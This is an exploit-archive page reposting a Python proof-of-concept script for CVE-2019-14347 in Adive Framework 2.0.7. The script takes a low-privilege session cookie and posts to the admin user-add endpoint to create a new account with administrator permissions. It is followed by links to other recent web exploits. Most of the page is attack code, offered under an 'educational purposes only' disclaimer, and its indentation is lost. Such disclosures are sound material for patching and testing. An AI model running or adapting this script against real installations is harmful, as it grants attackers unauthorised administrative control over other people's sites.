Adive framework 2.0.7 privilege escalation Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-11-08 | Type : webapps | Platform : php
This exploit / vulnerability Adive framework 2.0.7 privilege escalation is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
# Date: 2019-08-02
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows 10
# CVE : CVE-2019-14347

#Exploit

import requests
import sys

session = requests.Session()

http_proxy = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"

proxyDict = {
"http" : http_proxy,
"https" : https_proxy
}
print('[*****************************************]')
print('[ BYPASSING Adive Framework Version.2.0.5 ]')
print('[*****************************************]''\n')



print('[+]Login with the correct credentials:' '\n')

user = input('[+]user:')
password = input('[+]password:')
print('\n')

url = 'http://localhost/adive/admin/login'
values = {'user': user,
'password': password,
}

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()['PHPSESSID']

print('Your session cookie is:'+ cookie +'\n')


host = sys.argv[1]
print('Create the new user:')
userName = input('[+]User:')
userUsername = input('[+]UserName:')
password = input('[+]Password:')
password2 = input('[+]Confirm Password:')
print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
permission = input('[+]permission:')

if (password == password2):
#configure proxy burp

#hacer el request para la creacion de usuario
data = {
'userName':userName,
'userUsername':userUsername,
'pass':password,
'cpass':password2,
'permission':permission,

}

headers= {
'Cookie': 'PHPSESSID='+cookie
}

request = session.post(host+'/adive/admin/user/add', data=data,
headers=headers, proxies=proxyDict)
print('+--------------------------------------------------+')

else:
print ('Passwords dont match!!!')

#PoC
https://imgur.com/dUgLYi6
https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif

Adive framework 2.0.7 privilege escalation


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Adive framework 2.0.7 privilege escalation Vulnerability / Exploit